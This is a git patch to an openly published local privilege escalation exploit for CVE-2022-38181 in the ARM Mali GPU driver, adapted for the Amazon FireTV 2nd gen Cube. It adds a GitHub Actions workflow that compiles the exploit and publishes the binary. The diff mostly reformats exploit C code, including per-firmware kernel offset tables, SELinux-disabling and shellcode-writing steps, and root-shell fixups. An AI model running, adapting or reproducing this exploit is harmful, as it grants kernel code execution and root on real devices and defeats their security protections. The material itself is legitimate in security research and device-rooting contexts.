From 8654c21039fa21c1ac5d44d12d20be02d6dcfc34 Mon Sep 17 00:00:00 2001 From: Syuugo Date: Wed, 1 May 2024 21:48:34 +0900 Subject: [PATCH] Add build workflow --- .github/workflows/compile.yml | 27 ++++++++ .gitignore | 1 + README.md | 2 +- mali_base_jm_kernel.h | 2 - mali_shrinker_mmap32.c | 115 +++++++++++++++++----------------- 5 files changed, 86 insertions(+), 61 deletions(-) create mode 100644 .github/workflows/compile.yml create mode 100644 .gitignore diff --git a/.github/workflows/compile.yml b/.github/workflows/compile.yml new file mode 100644 index 0000000..00dd57d --- /dev/null +++ b/.github/workflows/compile.yml @@ -0,0 +1,27 @@ +name: Compile + +on: + push: + paths: + - '*.c' + - '*.h' + - '.github/workflows/compile.yml' + workflow_dispatch: + +jobs: + compile: + name: Compile + runs-on: ubuntu-latest + + steps: + - name: Checkout + uses: actions/checkout@v4 + + - name: Compile + run: $ANDROID_NDK/toolchains/llvm/prebuilt/linux-x86_64/bin/armv7a-linux-androideabi28-clang -DSHELL mali_shrinker_mmap32.c -o shrinker + + - name: Uplaod + uses: actions/upload-artifact@v4 + with: + name: CVE-2022-38181 + path: shrinker diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..19dc2d2 --- /dev/null +++ b/.gitignore @@ -0,0 +1 @@ +/shrinker diff --git a/README.md b/README.md index de10a89..d11372a 100644 --- a/README.md +++ b/README.md @@ -1,6 +1,6 @@ ## Exploit for CVE-2022-38181 for FireTV 2nd gen Cube -This is a fork of security researcher Man Yue Mo's Pixel 6 POC for CVE_2022_38181. Read his detailed write-up of the vulnerability here. Changes have been made to account for FireOS's 32bit userspace, as well as the 2nd gen Cube's older Bifrost drivers (r16p0) and Linux kernel (4.9.113) versions. The POC exploits a bug in the ARM Mali kernel driver to gain arbitrary kernel code execution, which is then used to disable SELinux and gain root. +This is a fork of security researcher Man Yue Mo's [Pixel 6 POC](https://github.com/github/securitylab/tree/main/SecurityExploits/Android/Mali/CVE_2022_38181) for CVE-2022-38181. Read his detailed write-up of the vulnerability [here](https://github.blog/2023-01-23-pwning-the-all-google-phone-with-a-non-google-bug/). Changes have been made to account for FireOS's 32bit userspace, as well as the 2nd gen Cube's older Bifrost drivers (r16p0) and Linux kernel (4.9.113) versions. The POC exploits a bug in the ARM Mali kernel driver to gain arbitrary kernel code execution, which is then used to disable SELinux and gain root. I used the following command to compile with clang in ndk-21: ``` diff --git a/mali_base_jm_kernel.h b/mali_base_jm_kernel.h index 3f5a460..844c3da 100644 --- a/mali_base_jm_kernel.h +++ b/mali_base_jm_kernel.h @@ -831,7 +831,6 @@ struct base_jd_atom_v2 { // __u8 jobslot; //missing from Bifrost r16p0 base_jd_core_req core_req; // __u8 renderpass_id; //missing from Bifrost r16p0 - }; */ typedef struct base_jd_atom_v2 { @@ -1233,4 +1232,3 @@ struct base_dump_cpu_gpu_counters { }; #endif /* _UAPI_BASE_JM_KERNEL_H_ */ - diff --git a/mali_shrinker_mmap32.c b/mali_shrinker_mmap32.c index e8d2e9c..48fe5d5 100644 --- a/mali_shrinker_mmap32.c +++ b/mali_shrinker_mmap32.c @@ -233,7 +233,7 @@ // PS7624/3337 #define SELINUX_ENFORCING_7624_3337 0x185d634 -#define SEL_READ_HANDLE_UNKNOWN_7624_3337 0x3641c4 +#define SEL_READ_HANDLE_UNKNOWN_7624_3337 0x3641c4 #define INIT_CRED_7624_3337 0x15fb568 #define COMMIT_CREDS_7624_3337 0x4ccb0 #define ADD_INIT_7624_3337 0x9115a000 //add x0, x0, #0x568 @@ -300,7 +300,7 @@ void setup_mali(int fd, int group_id) { struct kbase_ioctl_set_flags set_flags = {0}; if (ioctl(fd, KBASE_IOCTL_SET_FLAGS, &set_flags) < 0) { err(1, "set flags failed\n"); - } + } } @@ -329,7 +329,7 @@ void jit_init(int fd, uint64_t va_pages, uint64_t trim_level, int group_id) { uint64_t jit_allocate(int fd, uint8_t atom_number, uint8_t id, uint64_t va_pages, uint64_t gpu_alloc_addr, uint64_t* gpu_alloc_region) { struct base_jit_alloc_info info = {0}; struct base_jd_atom_v2 atom = {0}; - + info.id = id; info.gpu_alloc_addr = gpu_alloc_addr; info.va_pages = va_pages; @@ -366,7 +366,7 @@ void jit_free(int fd, uint8_t atom_number, uint8_t id) { if (ioctl(fd, KBASE_IOCTL_JOB_SUBMIT, &submit) < 0) { err(1, "submit job failed\n"); } - + } void mem_flags_change(int fd, uint64_t gpu_addr, uint32_t flags, int ignore_results) { @@ -648,7 +648,7 @@ void write_to(int mali_fd, uint64_t gpu_addr, uint64_t value, int atom_number, e struct MALI_JOB_HEADER jh = {0}; jh.is_64b = true; jh.type = MALI_JOB_TYPE_WRITE_VALUE; - + struct MALI_WRITE_VALUE_JOB_PAYLOAD payload = {0}; payload.type = type; payload.immediate_value = value; @@ -743,166 +743,166 @@ void select_offset() { char fingerprint[256]; int len = __system_property_get("ro.build.fingerprint", fingerprint); LOG("fingerprint: %s\n", fingerprint); - + if (!strcmp(fingerprint, "Amazon/raven/raven:7.0/PS7212/1333N:user/amz-p,release-keys")) { selinux_enforcing = SELINUX_ENFORCING_7212_1333; sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7212_1333; fixup_root_shell(INIT_CRED_7212_1333, COMMIT_CREDS_7212_1333, SEL_READ_HANDLE_UNKNOWN_7212_1333, ADD_INIT_7212_1333, ADD_COMMIT_7212_1333); - return; - } - + return; + } + if (!strcmp(fingerprint, "Amazon/raven/raven:7.0/PS7216/1582N:user/amz-p,release-keys")) { selinux_enforcing = SELINUX_ENFORCING_7216_1582; sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7216_1582; fixup_root_shell(INIT_CRED_7216_1582, COMMIT_CREDS_7216_1582, SEL_READ_HANDLE_UNKNOWN_7216_1582, ADD_INIT_7216_1582, ADD_COMMIT_7216_1582); - return; - } - + return; + } + if (!strcmp(fingerprint, "Amazon/raven/raven:7.0/PS7224/1752N:user/amz-p,release-keys")) { selinux_enforcing = SELINUX_ENFORCING_7224_1752; sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7224_1752; fixup_root_shell(INIT_CRED_7224_1752, COMMIT_CREDS_7224_1752, SEL_READ_HANDLE_UNKNOWN_7224_1752, ADD_INIT_7224_1752, ADD_COMMIT_7224_1752); - return; - } + return; + } if (!strcmp(fingerprint, "Amazon/raven/raven:7.0/PS7229/1853N:user/amz-p,release-keys")) { selinux_enforcing = SELINUX_ENFORCING_7229_1853; sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7229_1853; fixup_root_shell(INIT_CRED_7229_1853, COMMIT_CREDS_7229_1853, SEL_READ_HANDLE_UNKNOWN_7229_1853, ADD_INIT_7229_1853, ADD_COMMIT_7229_1853); - return; - } - + return; + } + if (!strcmp(fingerprint, "Amazon/raven/raven:7.0/PS7229/1856N:user/amz-p,release-keys")) { selinux_enforcing = SELINUX_ENFORCING_7229_1856; sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7229_1856; fixup_root_shell(INIT_CRED_7229_1856, COMMIT_CREDS_7229_1856, SEL_READ_HANDLE_UNKNOWN_7229_1856, ADD_INIT_7229_1856, ADD_COMMIT_7229_1856); - return; + return; } - + if (!strcmp(fingerprint, "Amazon/raven/raven:7.0/PS7234/2039N:user/amz-p,release-keys")) { selinux_enforcing = SELINUX_ENFORCING_7234_2039; sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7234_2039; fixup_root_shell(INIT_CRED_7234_2039, COMMIT_CREDS_7234_2039, SEL_READ_HANDLE_UNKNOWN_7234_2039, ADD_INIT_7234_2039, ADD_COMMIT_7234_2039); - return; + return; } - + if (!strcmp(fingerprint, "Amazon/raven/raven:7.0/PS7234/2042N:user/amz-p,release-keys")) { selinux_enforcing = SELINUX_ENFORCING_7234_2042; sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7234_2042; fixup_root_shell(INIT_CRED_7234_2042, COMMIT_CREDS_7234_2042, SEL_READ_HANDLE_UNKNOWN_7234_2042, ADD_INIT_7234_2042, ADD_COMMIT_7234_2042); - return; + return; } if (!strcmp(fingerprint, "Amazon/raven/raven:7.0/PS7242/2216N:user/amz-p,release-keys")) { selinux_enforcing = SELINUX_ENFORCING_7242_2216; sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7242_2216; fixup_root_shell(INIT_CRED_7242_2216, COMMIT_CREDS_7242_2216, SEL_READ_HANDLE_UNKNOWN_7242_2216, ADD_INIT_7242_2216, ADD_COMMIT_7242_2216); - return; - } + return; + } if (!strcmp(fingerprint, "Amazon/raven/raven:7.0/PS7242/2896N:user/amz-p,release-keys")) { selinux_enforcing = SELINUX_ENFORCING_7242_2896; sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7242_2896; fixup_root_shell(INIT_CRED_7242_2896, COMMIT_CREDS_7242_2896, SEL_READ_HANDLE_UNKNOWN_7242_2896, ADD_INIT_7242_2896, ADD_COMMIT_7242_2896); - return; - } + return; + } if (!strcmp(fingerprint, "Amazon/raven/raven:7.0/PS7242/2906N:user/amz-p,release-keys")) { selinux_enforcing = SELINUX_ENFORCING_7242_2906; sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7242_2906; fixup_root_shell(INIT_CRED_7242_2906, COMMIT_CREDS_7242_2906, SEL_READ_HANDLE_UNKNOWN_7242_2906, ADD_INIT_7242_2906, ADD_COMMIT_7242_2906); - return; - } + return; + } if (!strcmp(fingerprint, "Amazon/raven/raven:7.0/PS7242/3515N:user/amz-p,release-keys")) { selinux_enforcing = SELINUX_ENFORCING_7242_3515; sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7242_3515; fixup_root_shell(INIT_CRED_7242_3515, COMMIT_CREDS_7242_3515, SEL_READ_HANDLE_UNKNOWN_7242_3515, ADD_INIT_7242_3515, ADD_COMMIT_7242_3515); - return; - } + return; + } if (!strcmp(fingerprint, "Amazon/raven/raven:7.0/PS7242/3516N:user/amz-p,release-keys")) { selinux_enforcing = SELINUX_ENFORCING_7242_3516; sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7242_3516; fixup_root_shell(INIT_CRED_7242_3516, COMMIT_CREDS_7242_3516, SEL_READ_HANDLE_UNKNOWN_7242_3516, ADD_INIT_7242_3516, ADD_COMMIT_7242_3516); - return; - } + return; + } if (!strcmp(fingerprint, "Amazon/raven/raven:7.0/PS7273/2625N:user/amz-p,release-keys")) { selinux_enforcing = SELINUX_ENFORCING_7273_2625; sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7273_2625; fixup_root_shell(INIT_CRED_7273_2625, COMMIT_CREDS_7273_2625, SEL_READ_HANDLE_UNKNOWN_7273_2625, ADD_INIT_7273_2625, ADD_COMMIT_7273_2625); - return; - } + return; + } if (!strcmp(fingerprint, "Amazon/raven/raven:9/PS7279.2766N/0023253929472:user/amz-p,release-keys")) { selinux_enforcing = SELINUX_ENFORCING_7279_2766; sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7279_2766; fixup_root_shell(INIT_CRED_7279_2766, COMMIT_CREDS_7279_2766, SEL_READ_HANDLE_UNKNOWN_7279_2766, ADD_INIT_7279_2766, ADD_COMMIT_7279_2766); - return; - } + return; + } if (!strcmp(fingerprint, "Amazon/raven/raven:9/PS7285.2877N/0023723719936:user/amz-p,release-keys")) { selinux_enforcing = SELINUX_ENFORCING_7285_2877; sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7285_2877; fixup_root_shell(INIT_CRED_7285_2877, COMMIT_CREDS_7285_2877, SEL_READ_HANDLE_UNKNOWN_7285_2877, ADD_INIT_7285_2877, ADD_COMMIT_7285_2877); - return; - } + return; + } if (!strcmp(fingerprint, "Amazon/raven/raven:9/PS7285.2880N/0023723720704:user/amz-p,release-keys")) { selinux_enforcing = SELINUX_ENFORCING_7285_2880; sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7285_2880; fixup_root_shell(INIT_CRED_7285_2880, COMMIT_CREDS_7285_2880, SEL_READ_HANDLE_UNKNOWN_7285_2880, ADD_INIT_7285_2880, ADD_COMMIT_7285_2880); - return; - } + return; + } if (!strcmp(fingerprint, "Amazon/raven/raven:9/PS7292.2982N/0024126400000:user/amz-p,release-keys")) { selinux_enforcing = SELINUX_ENFORCING_7292_2982; sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7292_2982; fixup_root_shell(INIT_CRED_7292_2982, COMMIT_CREDS_7292_2982, SEL_READ_HANDLE_UNKNOWN_7292_2982, ADD_INIT_7292_2982, ADD_COMMIT_7292_2982); - return; - } + return; + } if (!strcmp(fingerprint, "Amazon/raven/raven:9/PS7292.2984N/0024126400512:user/amz-p,release-keys")) { selinux_enforcing = SELINUX_ENFORCING_7292_2984; sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7292_2984; fixup_root_shell(INIT_CRED_7292_2984, COMMIT_CREDS_7292_2984, SEL_READ_HANDLE_UNKNOWN_7292_2984, ADD_INIT_7292_2984, ADD_COMMIT_7292_2984); - return; - } + return; + } if (!strcmp(fingerprint, "Amazon/raven/raven:9/PS7603.3110N/0025065956864:user/amz-p,release-keys")) { selinux_enforcing = SELINUX_ENFORCING_7603_3110; sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7603_3110; fixup_root_shell(INIT_CRED_7603_3110, COMMIT_CREDS_7603_3110, SEL_READ_HANDLE_UNKNOWN_7603_3110, ADD_INIT_7603_3110, ADD_COMMIT_7603_3110); - return; - } + return; + } if (!strcmp(fingerprint, "Amazon/raven/raven:9/PS7608.3614N/0025468739072:user/amz-p,release-keys")) { selinux_enforcing = SELINUX_ENFORCING_7608_3614; sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7608_3614; fixup_root_shell(INIT_CRED_7608_3614, COMMIT_CREDS_7608_3614, SEL_READ_HANDLE_UNKNOWN_7608_3614, ADD_INIT_7608_3614, ADD_COMMIT_7608_3614); - return; - } + return; + } if (!strcmp(fingerprint, "Amazon/raven/raven:9/PS7614.3227N/0025938402048:user/amz-p,release-keys")) { selinux_enforcing = SELINUX_ENFORCING_7614_3227; sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7614_3227; fixup_root_shell(INIT_CRED_7614_3227, COMMIT_CREDS_7614_3227, SEL_READ_HANDLE_UNKNOWN_7614_3227, ADD_INIT_7614_3227, ADD_COMMIT_7614_3227); - return; - } - + return; + } + if (!strcmp(fingerprint, "Amazon/raven/raven:9/PS7624.3337N/0026810845440:user/amz-p,release-keys")) { selinux_enforcing = SELINUX_ENFORCING_7624_3337; sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7624_3337; fixup_root_shell(INIT_CRED_7624_3337, COMMIT_CREDS_7624_3337, SEL_READ_HANDLE_UNKNOWN_7624_3337, ADD_INIT_7624_3337, ADD_COMMIT_7624_3337); - return; - } - + return; + } + if (!strcmp(fingerprint, "Amazon/raven/raven:9/PS7633.3445N/0027347744000:user/amz-p,release-keys")) { selinux_enforcing = SELINUX_ENFORCING_7633_3445; sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7633_3445; fixup_root_shell(INIT_CRED_7633_3445, COMMIT_CREDS_7633_3445, SEL_READ_HANDLE_UNKNOWN_7633_3445, ADD_INIT_7633_3445, ADD_COMMIT_7633_3445); - return; + return; } err(1, "unable to match build id\n"); @@ -1009,8 +1009,8 @@ int trigger(int mali_fd, int mali_fd2, int* flush_idx) { LOG("Found pgd %d, %llx\n", pgd_idx, pgd); atom_number++; write_selinux(mali_fd, mali_fd2, pgd, &(reserved[0])); - write_shellcode(mali_fd, mali_fd2, pgd, &(reserved[0])); - run_enforce(); + write_shellcode(mali_fd, mali_fd2, pgd, &(reserved[0])); + run_enforce(); cleanup(mali_fd, pgd); return 0; } @@ -1080,4 +1080,3 @@ Java_com_example_hellojni_MaliExpService_stringFromJNI( JNIEnv* env, jobject thi return -1; } #endif -